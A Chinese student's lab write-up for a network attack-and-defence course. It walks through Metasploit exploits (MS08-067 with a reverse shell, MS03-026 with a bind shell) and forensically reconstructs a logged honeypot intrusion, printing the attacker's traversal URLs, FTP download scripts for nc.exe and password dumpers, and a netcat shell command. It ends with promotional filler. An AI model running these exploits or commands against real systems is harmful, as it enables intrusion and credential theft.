20232906 2023-2024-2 《网络与系统攻防技术》第六次作业(1)

图二 Win2kServer的IP地址
4. 这里我们按照图三的方式打开cygwin shell,并输入命令msfconsole等待Metasploit加载完成。

图三 打开WinXPAttacker的Metasploit
5. 然后我们使用MS08-067漏洞,使用命令如下:

search ms08_067 #搜寻ms08\_067漏洞的利用模块,等待输出后再输入下一行
use windows/smb/ms08_067_netapi # 将ms08\_067作为目标漏洞

MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize函数时触发的,而NetPathCanonicalize函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,对远程访问的路径进行规范化,而在NetpwPathCanonicalize函数中存在的逻辑错误,造成栈缓冲区可被溢出,而获得远程代码执行(Remote Code Execution)。MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。

这一过程的截图如图四所示:

图四 查找并使用MS08-067漏洞利用模块
6. 然后我们设置攻击载荷为TCP反向连接载荷,并设置lhost为攻击机IP,rhost为靶机IP,具体命令为:

set payload generic/shell_reverse_tcp
set LHOST 192.168.200.10	# LHOST、RHOST不区分大小写
set RHOST 192.168.200.131
show options	# 查看设置好的参数

然后target设置为0即自动即可,这一过程的截图如图五所示:

图五 设置攻击载荷和相关IP地址
7. 最后使用命令exploit即可获取靶机的Shell,如图六所示。

图六 成功获取靶机Shell

2.2 取证分析实践:解码一次成功的NT系统破解攻击
  1. 用Wireshark打开snort-0204@0117.log文件并通过题目给出信息设置过滤条件ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106对数据包进行过滤,然后追踪TCP流,如图七所示。

图七 追踪TCP流
2. 当翻到第7个TCP流的时候,我们可以发现使用了目录遍历攻击,其特征为%C0%AF,如图八所示。

原理:在URL编码中,%xx表示一个字节(0-255 的数字),每个字节x都是十六进制数字,因此%C0%AF,在 URL 中对应于将字节C0 AF放入解码后的 URL,即字节 192 (1100 0000) 和字节 175 (1010 1111)。这里使用到了Unicode扩展,其中,1110 xxxx意味着它是一个三字节序列的开始,1111 0xxx是一个四字节序列,而C0(110 0 0000)则表示该序列为两字节序列,且第一字节内容为0000,而第二字节的AF(10101111),最开始的10表示这是第一字节的延续,且第二字节内容为10 1111,转换为10进制为47,在ASCII码中代表/。总结一下C0AF所代表的为110 0 0000 10 10 1111,加粗部分为序列头部信息,数据部分转换后即为符号/,将GET请求的链接解码后即可得到:/guest/default.asp/…/…/…/…/…/…/boot.ini,攻击者通过该方法访问到了靶机的boot.ini文件,从而获知服务器的操作系统版本为Windows NT Server, Enterprise Edition Version 4.00。

图八 TCP流7发现目录遍历攻击
3. 之后流11中我发现了SQL注入攻击,其注入语句为:

Select \* from Customers where City='|shell("cmd /c echo werd >> c:\fun")|'driver={Microsoft Access Driver (\*mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmrmdb;
--!ADM!ROX!YOUR!WORLD!--

这里通过命令cmd /c echo werd >> c:\fun将“werd”写入了C盘中的fun文件中,利用了MS99-025 Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution这个Metasploit攻击模块,据此推测攻击者使用了Metasploit对靶机进行了攻击。

MS99-025:即CVE-1999-1011,IIS 3.x 和 4.x 中 Microsoft 数据访问组件 (MDAC) 的远程数据服务 (RDS) DataFactory 组件公开了不安全的方法,允许远程攻击者执行任意命令。

图九 TCP流11发现SQL注入攻击
4. 紧接着流12中攻击者继续使用目录遍历攻击访问了/guest/default.asp/../../../../../../fun,其内容如图十所示,发现了“werd”证明漏洞利用成功。

图十 TCP流12发现目录遍历攻击
5. 之后从流14开始到流26,陆续使用SQL注入漏洞执行了以下指令:

cmd /c echo user johna2k > ftpcom	# 流14
cmd /c echo hacker2000 >> ftpcom	# 流16
cmd /c echo get samdump.dll >> ftpcom # 流18
cmd /c echo get pdump.exe >> ftpcom	# 流20
cmd /c echo get nc.exe >> ftpcom	# 流22
cmd /c echo quit >> ftpcom			# 流24
cmd /c ftp -s:ftpcom -n www.nether.net	# 流26

攻击者尝试创建一个FTP用户,用户名为johna2k,密码为hacker2000,并分别用FTP下载了samdump.dllpdump.exenc.exe
6. 之后的流27攻击者尝试登录FTP,但却失败了(530 Login incorrect)。

图十一 FTP登录失败
7. 于是从流30开始攻击者继续使用SQL注入漏洞执行了以下命令:

cmd /c pdump.exe >> new.pass	# 流30
cmd /c echo user johna2k > ftpcom2	# 流32
cmd /c echo hacker2000 >> ftpcom2	# 流34
cmd /c put new.pass >> ftpcom2	# 流36
cmd /c echo quit >> ftpcom2	# 流38
cmd /c ftp -s:ftpcom2 -n www.nether.net	# 流40

攻击者使用pdump.exe获取new.pass,并继续尝试创建一个FTP用户,用户名为johna2k,密码为hacker2000,之后将获取的密码写入ftpcom2中,但依旧失败了,如图十二所示。

图十二 FTP登录依然失败
8. 攻击者继续使用SQL注入漏洞执行了以下操作:

cmd /c ftp 213.116.251.162	# 流47,让靶机连接213.116.251.162
cmd /c echo open 213.116.251.162 > ftpcom	# 流50
cmd /c echo user johna2k > ftpcom	# 流52
cmd /c echo hacker2000 >> ftpcom	# 流54
cmd /c echo get samdump.dll >> ftpcom	# 流56
cmd /c echo get pdump.exe >> ftpcom	# 流58
cmd /c echo get nc.exe >> ftpcom	# 流60
cmd /c echo quit >> ftpcom			# 流62
cmd /c ftp -s ftpcom			# 流64

cmd /c open 212.139.12.26			# 流66
cmd /c echo user johna2k > sasfile	# 流68
cmd /c echo haxedj00 > sasfile	# 流70
cmd /c echo get pdump.exe >> sasfile	# 流72
cmd /c echo get samdump.dll >> sasfile	# 流74
cmd /c echo get nc.exe >> sasfile	# 流76
cmd /c echo echo quit >> sasfile	# 流78
cmd /c ftp -s sasfile	# 流80

cmd /c open 212.116.251.162	# 流82
cmd /c echo user johna2k > sasfile	# 流84
cmd /c echo haxedj00 > sasfile	# 流86
cmd /c echo get pdump.exe >> sasfile	# 流88
cmd /c echo get samdump.dll >> sasfile	# 流90
cmd /c echo get nc.exe >> sasfile	# 流92
cmd /c echo echo quit >> sasfile	# 流94
cmd /c ftp -s sasfile	# 流96

  1. 在流97中,攻击者使用目录遍历攻击执行了以下命令:
/msadc/../../../../../../winnt/system32/cmd.exe /c copy C:\winnt\system32\cmd.exe cmd1.exe	# 流97,复制cmd
/msadc/../../../../../../program files/common files/system/msadc/cmd1.exe /c echo open 213.116.251.162 >ftpcom	# 流98,将内容写入ftpcom
/msadc/../../../../../../program files/common files/system/msadc/cmd1.exe?/c echo johna2k >>ftpcom	# 流99,将内容写入ftpcom
/msadc/../../../../../../program files/common files/system/msadc/cmd1.exe?/c echo haxedj00 >>ftpcom	# 流100,将内容写入ftpcom,下同
/msadc/../../../../../../program files/common files/system/msadc/cmd1.exe?/c echo get nc.exe >>ftpcom	# 流101
/msadc/../../../../../../program files/common files/system/msadc/cmd1.exe?/c echo get pdump.exe >>ftpcom	# 流102
/msadc/../../../../../../program files/common files/system/msadc/cmd1.exe?/c echo get samdump.dll >>ftpcom	# 流103
/msadc/../../../../../../program files/common files/system/msadc/cmd1.exe?/c echo quit >>ftpcom	# 流104
/msadc/../../../../../../program files/common files/system/msadc/cmd1.exe?/c ftp -s:ftpcom	# 流105

  1. 最终,在流106时攻击者成功连接FTP,并通过靶机的1271端口下载nc.exe,通过靶机的1272端口下载pdump.exe,通过靶机的1273端口下载samdump.dll,如图十三所示。

图十三 成功连接FTP
11. 然后,流109中攻击者通过命令/msadc/../../../../../../program files/common files/system/msadc/cmd1.exe?/c nc -l -p 6969 -e cmd1.exe通过netcat在6969端口处反弹了一个shell,这下攻击者即可通过netcat远程访问靶机了(拿到了shell),于是我们便看到流111给攻击者使用shell控制靶机了,如图十四所示。

图十四 成功连接FTP
12. 攻击者通过命令del ftpcom删除了攻击时的相关痕迹,然后尝试使用命令net session 时发现无访问权限,之后又尝试net users获取用户列表
,通过net group查看组用户、net locagroup查看本地组用户、net group domain admins查看所有域管理员列表,但都没有权限。

图十五 流111中的尝试
13. 然后攻击者删除了samdump.dllpdump.exe。使用rdisk尝试获得SAM口令文件(安全账号管理器),rdisk 是磁盘修复程序,执行 rdisk /s- 备份关键系统信息,在/repair 目录中就会创建一个名为 sam._ 的 SAM 压缩拷贝,攻击者尝试查看文件内容,使用type sam._,但发现没有权限,如图十六所示。

图十六 流111中的尝试
14. 随后攻击者又在流169和流178两次访问了靶机,并在流178中得出了图十七的结论,证明攻击者发现了他的目标是一台蜜罐主机。

图十七 流111中的尝试
15. 为了防止这样的攻击,应该及时更新操作系统官方的漏洞补丁,并采用杀毒软件动态监控可能出现的攻击行为。

2.3 团队对抗实践:windows系统远程渗透攻击和分析
IP地址\成员20232906陈瀚文20232925操昕
攻击机192.168.1.230192.168.1.53
靶机192.168.1.135192.168.1.131
  1. 攻击方
    这里我使用了MS03-026 / MS03-039: Buffer Overrun In RPCSS Service Could Allow Code Execution (823980 / 824146)漏洞进行攻击,使用攻击命令如下:
use exploit/windows/dcerpc/ms03_026_dcom
set payload windows/shell_bind_tcp
set RHOST 192.168.1.131	# 设置靶机IP

MS03-026:RPC 的一部分存在漏洞,用于处理通过 TCP/IP 进行消息交换。 失败会导致错误处理格式不正确的消息。 此特定漏洞影响具有 RPC 的分布式组件对象模型 (DCOM) 接口,该接口侦听已启用 RPC 的端口。 此接口处理客户端计算机发送到服务器的 DCOM 对象激活请求。 成功利用此漏洞的攻击者能够对受影响的系统运行具有本地系统特权的代码。 攻击者能够对系统执行任何操作,包括安装程序、查看更改或删除数据,或者创建具有完全权限的新帐户。
若要利用此漏洞,攻击者需要向特定 RPC 端口上的远程计算机发送特殊形式的请求。

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

[外链图片转存中…(img-h4Ccbkyf-1715796190341)]

[外链图片转存中…(img-yo3W5azp-1715796190341)]

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值